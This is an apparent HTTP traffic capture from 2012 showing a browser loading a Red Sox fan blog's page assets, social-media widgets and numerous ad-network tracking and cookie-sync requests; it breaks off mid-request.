GET /navigation/images/twitter.png HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bloguinmedia.com/navigation/css/main.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 19 Nov 2012 04:17:44 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 21 Sep 2012 01:10:17 GMT
Etag: &quot;226b91-760-4ca2be721d040&quot;
Accept-Ranges: bytes
Content-Length: 1888
Keep-Alive: timeout=5, max=497
Connection: Keep-Alive
GET /navigation/images/rss.png HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bloguinmedia.com/navigation/css/main.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 19 Nov 2012 04:17:44 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 21 Sep 2012 01:10:16 GMT
Etag: &quot;226b8e-810-4ca2be7128e00&quot;
Accept-Ranges: bytes
Content-Length: 2064
Keep-Alive: timeout=5, max=497
Connection: Keep-Alive
GET /navigation/images/facebook.png HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bloguinmedia.com/navigation/css/main.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 19 Nov 2012 04:17:44 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 21 Sep 2012 01:10:14 GMT
Etag: &quot;226b7f-4cf-4ca2be6f40980&quot;
Accept-Ranges: bytes
Content-Length: 1231
Keep-Alive: timeout=5, max=498
Connection: Keep-Alive
GET /navigation/images/newsletter0.png HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bloguinmedia.com/navigation/css/main.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 19 Nov 2012 04:17:44 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 21 Sep 2012 01:10:16 GMT
Etag: &quot;226b8b-107-4ca2be7128e00&quot;
Accept-Ranges: bytes
Content-Length: 263
Keep-Alive: timeout=5, max=498
Connection: Keep-Alive
GET /navigation/images/close-btn.png HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 19 Nov 2012 04:17:44 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 21 Sep 2012 01:10:14 GMT
Etag: &quot;226b7a-448-4ca2be6f40980&quot;
Accept-Ranges: bytes
Content-Length: 1096
Keep-Alive: timeout=5, max=498
Connection: Keep-Alive
GET /rsrc.php/v2/yJ/r/Qu-mFzAdV7Q.js HTTP/1.1

Host: static.ak.fbcdn.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D17%23cb%3Df14098a00cc2166%26origin%3Dhttp%253A%252F%252Ffenwaywest.com%252Ff2da6618592290a%26domain%3Dfenwaywest.com%26relation%3Dparent.parent&amp;href=http%3A%2F%2Fwww.fenwaywest.com%2Fsh404sef-custom-content%2F404.html&amp;node_type=link&amp;width=90&amp;font=arial&amp;layout=button_count&amp;colorscheme=light&amp;action=like&amp;show_faces=false&amp;send=false&amp;extended_social_context=false
Origin: http://www.facebook.com
HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Sat, 17 Nov 2012 00:17:41 GMT
X-Content-Type-Options: nosniff
Content-Encoding: gzip
X-FB-Debug: AT2bGKOZYGuklXy64jVJve2R06/vXFDzLhORF14o8Qw=
Content-Length: 37570
Vary: Accept-Encoding
Cache-Control: public, max-age=31349880
Expires: Sun, 17 Nov 2013 00:35:45 GMT
Date: Mon, 19 Nov 2012 04:17:45 GMT
Connection: keep-alive
GET /meter.asp?site=s27fenwaywest&refer=http%3A//www.88websitedesign.com/index.php%3Fwebsite-design-and-development-services-web-company%3Dseo&ip=195.159.140.221&w=1176&h=885&clr=24&tzo=-60&lang=en-US&pg=http%3A//fenwaywest.com/media/index.php&js=1&rnd=0.8477681867847436&zyxver=1.120524 HTTP/1.1

Host: b27.sitemeter.com
GET /meter.asp?site=s27fenwaywest&amp;refer=http%3A//www.88websitedesign.com/index.php%3Fwebsite-design-and-development-services-web-company%3Dseo&amp;ip=195.159.140.221&amp;w=1176&amp;h=885&amp;clr=24&amp;tzo=-60&amp;lang=en-US&amp;pg=http%3A//fenwaywest.com/media/index.php&amp;js=1&amp;rnd=0.8477681867847436&amp;zyxver=1.120524 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/gif
Connection: close
Date: Mon, 19 Nov 2012 04:20:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 669
Cache-Control: private
GET /meter.asp?site=s52bloguinbaseball&refer=http%3A//www.88websitedesign.com/index.php%3Fwebsite-design-and-development-services-web-company%3Dseo&ip=195.159.140.221&w=1176&h=885&clr=24&tzo=-60&lang=en-US&pg=http%3A//fenwaywest.com/media/index.php&js=1&rnd=0.9896234188651021&zyxver=1.120524 HTTP/1.1

Host: b21.sitemeter.com
GET /meter.asp?site=s52bloguinbaseball&amp;refer=http%3A//www.88websitedesign.com/index.php%3Fwebsite-design-and-development-services-web-company%3Dseo&amp;ip=195.159.140.221&amp;w=1176&amp;h=885&amp;clr=24&amp;tzo=-60&amp;lang=en-US&amp;pg=http%3A//fenwaywest.com/media/index.php&amp;js=1&amp;rnd=0.9896234188651021&amp;zyxver=1.120524 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/gif
Connection: close
Date: Mon, 19 Nov 2012 04:21:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 669
Cache-Control: private
GET /rsrc.php/v2/yI/x/1dQf_ATK831.png HTTP/1.1

Host: static.ak.fbcdn.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D17%23cb%3Df14098a00cc2166%26origin%3Dhttp%253A%252F%252Ffenwaywest.com%252Ff2da6618592290a%26domain%3Dfenwaywest.com%26relation%3Dparent.parent&amp;href=http%3A%2F%2Fwww.fenwaywest.com%2Fsh404sef-custom-content%2F404.html&amp;node_type=link&amp;width=90&amp;font=arial&amp;layout=button_count&amp;colorscheme=light&amp;action=like&amp;show_faces=false&amp;send=false&amp;extended_social_context=false
HTTP/1.1 200 OK

Content-Type: image/png
Access-Control-Allow-Origin: *
Last-Modified: Fri, 29 Jun 2012 21:48:06 GMT
X-Content-Type-Options: nosniff
X-FB-Debug: DROeMGRPcdwLS4zkFLAnDVu5opvpxfNclOg2Khukp6I=
Content-Length: 567
Cache-Control: public, max-age=24399579
Expires: Wed, 28 Aug 2013 13:57:24 GMT
Date: Mon, 19 Nov 2012 04:17:45 GMT
Connection: keep-alive
GET /t.gif?_=1353298664331&count=horizontal&id=twitter-widget-1&lang=en&original_referer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&size=m&text=__404__&url=http%3A%2F%2Fwww.fenwaywest.com%2Fsh404sef-custom-content%2F404.html&via=FenwayWest&type=share&twttr_referrer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&twttr_widget=1&twttr_hask=0&twttr_li=0&twttr_pid= HTTP/1.1

Host: p.twitter.com
GET /t.gif?_=1353298664331&amp;count=horizontal&amp;id=twitter-widget-1&amp;lang=en&amp;original_referer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;size=m&amp;text=__404__&amp;url=http%3A%2F%2Fwww.fenwaywest.com%2Fsh404sef-custom-content%2F404.html&amp;via=FenwayWest&amp;type=share&amp;twttr_referrer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;twttr_widget=1&amp;twttr_hask=0&amp;twttr_li=0&amp;twttr_pid= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://platform.twitter.com/widgets/tweet_button.1352365724.html
HTTP/1.1 200 OK

Content-Type: image/gif
Etag: &quot;377d257f2d2e294916143c069141c1c5:1328738114&quot;
Last-Modified: Wed, 08 Feb 2012 21:55:14 GMT
Accept-Ranges: bytes
Content-Length: 43
Cache-Control: no-cache
P3P: CP=&quot;CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT&quot;
Date: Mon, 19 Nov 2012 04:17:45 GMT
Connection: keep-alive
GET /1585961/NO_b2c_A_728x90_nl_banner_131112_2012111308375744.swf?targetTag=_blank&clickTag=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3d32/7/90/%252a/f%253B265055670%253B0-0%253B0%253B90677919%253B3454-728/90%253B51411577/51378850/1%253B%253B%257Esscs%253D%253fhttp%3A//pixel.mathtag.com/click/img%3Fmt_aid%3D1709586981709445095%26mt_id%3D239527%26mt_adid%3D100412%26mt_uuid%3D50a9b2e2-9d68-d676-6901-3c5fafca2592%26redirect%3Dhttp%3A//www.klm.com/travel/no_no/plan_and_book/special_offers/flight_offers/index.htm%3FWT.mc_id%3D1585961%7C7153410%7C90677919%7C265055670%7C1349429%7C51411577%26WT.tsrc%3Ddisplay%26 HTTP/1.1

Host: s0.2mdn.net
GET /1585961/NO_b2c_A_728x90_nl_banner_131112_2012111308375744.swf?targetTag=_blank&amp;clickTag=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3d32/7/90/%252a/f%253B265055670%253B0-0%253B0%253B90677919%253B3454-728/90%253B51411577/51378850/1%253B%253B%257Esscs%253D%253fhttp%3A//pixel.mathtag.com/click/img%3Fmt_aid%3D1709586981709445095%26mt_id%3D239527%26mt_adid%3D100412%26mt_uuid%3D50a9b2e2-9d68-d676-6901-3c5fafca2592%26redirect%3Dhttp%3A//www.klm.com/travel/no_no/plan_and_book/special_offers/flight_offers/index.htm%3FWT.mc_id%3D1585961%7C7153410%7C90677919%7C265055670%7C1349429%7C51411577%26WT.tsrc%3Ddisplay%26 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3814.290927.AFFIPERF.COM19/B7153410.2;sz=728x90;ord=1709586981709445095;click=http://pixel.mathtag.com/click/img?mt_aid=1709586981709445095&amp;mt_id=239527&amp;mt_adid=100412&amp;mt_uuid=50a9b2e2-9d68-d676-6901-3c5fafca2592&amp;redirect=
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash
Last-Modified: Tue, 13 Nov 2012 07:37:59 GMT
Date: Mon, 19 Nov 2012 04:17:45 GMT
Expires: Tue, 20 Nov 2012 04:17:45 GMT
Cache-Control: public, max-age=86400
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 12326
X-XSS-Protection: 1; mode=block
GET /b?c1=8&c2=2101&c3=1234567891234567891&ns__t=1353298665495&ns_c=ISO-8859-1&c8=&c7=http%3A%2F%2Fdg.specificclick.net%2F%3Fy%3D3%26t%3Dh%26u%3Dhttp%253A%252F%252Ffenwaywest.com%252Fmedia%252Findex.php%26r%3Dhttp%253A%252F%252Fwww.88websitedesign.com%252Findex.php%253Fwebsite-design-and-development-services-web-company%253Dseo&c9=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

Host: b.scorecardresearch.com
GET /b?c1=8&amp;c2=2101&amp;c3=1234567891234567891&amp;ns__t=1353298665495&amp;ns_c=ISO-8859-1&amp;c8=&amp;c7=http%3A%2F%2Fdg.specificclick.net%2F%3Fy%3D3%26t%3Dh%26u%3Dhttp%253A%252F%252Ffenwaywest.com%252Fmedia%252Findex.php%26r%3Dhttp%253A%252F%252Fwww.88websitedesign.com%252Findex.php%253Fwebsite-design-and-development-services-web-company%253Dseo&amp;c9=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://dg.specificclick.net/?y=3&amp;t=h&amp;u=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;r=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo
Cookie: UID=a2978d-195.159.219.9-1353298656; UIDR=1353298656
HTTP/1.1 204 No Content

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 19 Nov 2012 04:17:45 GMT
Connection: keep-alive
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
GET /connect/xd_arbiter.php?version=17 HTTP/1.1

Host: s-static.ak.facebook.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
X-FB-Debug: JS4qOSg1Dl3AgVtg3MyBP4whcr8SZapA/Vud9cBlDwY=
Content-Length: 9847
Vary: Accept-Encoding
Cache-Control: public, max-age=30755938
Expires: Sun, 10 Nov 2013 03:36:43 GMT
Date: Mon, 19 Nov 2012 04:17:45 GMT
Connection: keep-alive
GET /ecw HTTP/1.1

Host: px.owneriq.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
HTTP/1.1 302 Moved Temporarily

Content-Type: text/html
Server: Apache/2.2.3 (CentOS)
Content-Length: 153
Location: http://px.owneriq.net/fr/epx.gif
X-Powered-By: PHP/5.2.17
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Vary: Accept-Encoding
Cache-Control: max-age=61714
Date: Mon, 19 Nov 2012 04:17:45 GMT
Connection: keep-alive
GET /fr/epx.gif HTTP/1.1

Host: px.owneriq.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
HTTP/1.1 200 OK

Content-Type: image/gif
Server: Apache/2.2.3 (CentOS)
Content-Length: 43
X-Powered-By: PHP/5.2.17
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Cache-Control: max-age=16970
Expires: Mon, 19 Nov 2012 09:00:35 GMT
Date: Mon, 19 Nov 2012 04:17:45 GMT
Connection: keep-alive
GET /cxweb_sync?ul_cb=1& HTTP/1.1

Host: t.pswec.com
GET /cxweb_sync?ul_cb=1&amp; HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: tuuid=ee1c69d9-2586-494e-a996-a504e533528a
HTTP/1.1 200 OK

Content-Type: image/gif
P3P: CP=&quot;NON DSP ADMo DEVo TAIo PSAo PSDo IVAo IVDo CONo OUR UNRo IND ONL UNI PUR COM NAV INT DEM STA PRE&quot;
Set-Cookie: tuuid=ee1c69d9-2586-494e-a996-a504e533528a; path=/; expires=Mon, 20-Nov-2017 04:17:45 GMT; domain=.pswec.com
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 43
Date: Mon, 19 Nov 2012 04:17:45 GMT
GET /pixel?google_nid=contextweb&google_cm&google_sc HTTP/1.1

Host: cm.g.doubleclick.net
GET /pixel?google_nid=contextweb&amp;google_cm&amp;google_sc HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 302 Found

Content-Type: text/html; charset=UTF-8
Location: http://bh.contextweb.com/bh/rtset?do=add&amp;pid=547259&amp;ev=CAESEKYS_yt-_5f3x4i1G1qPWZQ&amp;google_cver=1
Date: Mon, 19 Nov 2012 04:17:45 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Server: Cookie Matcher
Content-Length: 305
X-XSS-Protection: 1; mode=block
GET /fr/u.php?p=391363987594223&m=5858721859426781856 HTTP/1.1

Host: www.facebook.com
GET /fr/u.php?p=391363987594223&amp;m=5858721859426781856 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/bdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html
HTTP/1.1 200 OK

Content-Type: image/gif
Cache-Control: public, max-age=0
Date: Sun, 18 Nov 2012 20:17:45 PST
Expires: Sun, 18 Nov 2012 20:17:45 PST
Pragma: public
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Encoding: gzip
X-FB-Debug: SCwmifB9v7TWQoLy4lBCe1Xu06f9NhwuesnLve0aOK4=
Transfer-Encoding: chunked
Connection: keep-alive
GET /get/flashplayer/update/current/xml/version_en_win_pl.xml HTTP/1.1

Host: fpdownload2.macromedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/xml
Server: Apache
Last-Modified: Wed, 31 Oct 2012 21:22:10 GMT
Etag: &quot;87de33-256-4cd617ed12480&quot;
Accept-Ranges: bytes
Content-Length: 598
Date: Mon, 19 Nov 2012 04:17:45 GMT
Connection: keep-alive
GET /_/+1/fastbutton?bsv&size=medium&hl=en-US&origin=http%3A%2F%2Ffenwaywest.com&url=http%3A%2F%2Fwww.fenwaywest.com%2Fsh404sef-custom-content%2F404.html&jsh=m%3B%2F_%2Fapps-static%2F_%2Fjs%2Fgapi%2F__features__%2Frt%3Dj%2Fver%3DZmauHrJi-hM.no.%2Fsv%3D1%2Fam%3D!lVF6vhgpQzaIV3w7gg%2Fd%3D1%2Frs%3DAItRSTMTSuKxtbCl7AXnY1-y8dTDnN-tCQ HTTP/1.1

Host: plusone.google.com
GET /_/+1/fastbutton?bsv&amp;size=medium&amp;hl=en-US&amp;origin=http%3A%2F%2Ffenwaywest.com&amp;url=http%3A%2F%2Fwww.fenwaywest.com%2Fsh404sef-custom-content%2F404.html&amp;jsh=m%3B%2F_%2Fapps-static%2F_%2Fjs%2Fgapi%2F__features__%2Frt%3Dj%2Fver%3DZmauHrJi-hM.no.%2Fsv%3D1%2Fam%3D!lVF6vhgpQzaIV3w7gg%2Fd%3D1%2Frs%3DAItRSTMTSuKxtbCl7AXnY1-y8dTDnN-tCQ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=edge, chrome=1
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Mon, 19 Nov 2012 04:17:45 GMT
Content-Encoding: gzip
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
GET /match?p=11 HTTP/1.1

Host: match.rtbidder.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: bsuid=%3EtYgd%3A%24JyVk%3A%27h0
HTTP/1.1 302 Moved Temporarily

Content-Type: text/plain
Server: rtbidder
Date: Mon, 19 Nov 2012 04:17:45 GMT
Content-Length: 267
P3P: policyref=&quot;http://match.rtbidder.net/p3p.xml&quot;, CP=&quot;NOI DSP COR CURa ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo HISa TELo OUR STP&quot;
Pragma: no-cache
Set-Cookie: bsuid=%3EtYgd%3A%24JyVk%3A%27h0; path=/; domain=.rtbidder.net; expires=Sun, 17-Feb-2013 04:17:45 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Cache-Control: no-store, no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://bh.contextweb.com/bh/rtset?do=add&amp;pid=535393&amp;ev=50a9b2e6448a550dd77e72ed
GET /010921/fontLoader.swf HTTP/1.1

Host: banners.klm.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash
Server: nginx/0.6.39
Date: Mon, 19 Nov 2012 04:17:45 GMT
Content-Length: 701
Last-Modified: Tue, 13 Nov 2012 14:10:39 GMT
Connection: keep-alive
Accept-Ranges: bytes
GET /user/browser?p=b2108357999e9462&r=1 HTTP/1.1

Host: user.lucidmedia.com
GET /user/browser?p=b2108357999e9462&amp;r=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
